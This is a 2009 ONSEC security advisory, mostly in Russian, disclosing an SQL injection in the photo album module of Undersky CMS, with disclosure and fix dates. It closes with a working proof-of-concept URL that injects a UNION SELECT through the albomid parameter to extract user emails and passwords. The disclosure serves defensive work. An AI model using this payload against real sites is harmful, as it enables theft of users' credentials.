Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SECURITY] [DSA 1897-1] New horde3 packages fix arbitrary code execution

[ONSEC-09-017] Blogolet PHP including

[ONSEC-09-016] Blogolet XSS

[ONSEC-09-012] UMI.CMS Hash based Captcha

From:	ONSEC
Date:	28.09.2009
Subject:	[ONSEC-09-010] Undersky CMS SQL injection

[ONSEC-09-010] Undersky CMS SQL injection
Цель: Undersky CMS (http://www.undersky.ru)
Тип: SQL инъекция
Угроза: Высокая
Дата обнаружения: 03.07.2009
Дата оповещения разработчика: 03.07.2009
Дата выхода исправления: 05.07.2009
Автор: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Описание: Уязвимость существует в модуле фотоальбом. Отсутствие фильтрации символов в параметре albomid позволяет злоумышленнику осуществить произвольный SQL запрос и получить результат. Например, можно узнать личные данные пользователей.

http://demo.undersky.ru/foto.html?
albomid=1+AND+1=2+UNION+SELECT+1,email,3,
password,5,6,7,8,9,10,11,12,13,14,15,16,17
+FROM+users&p=1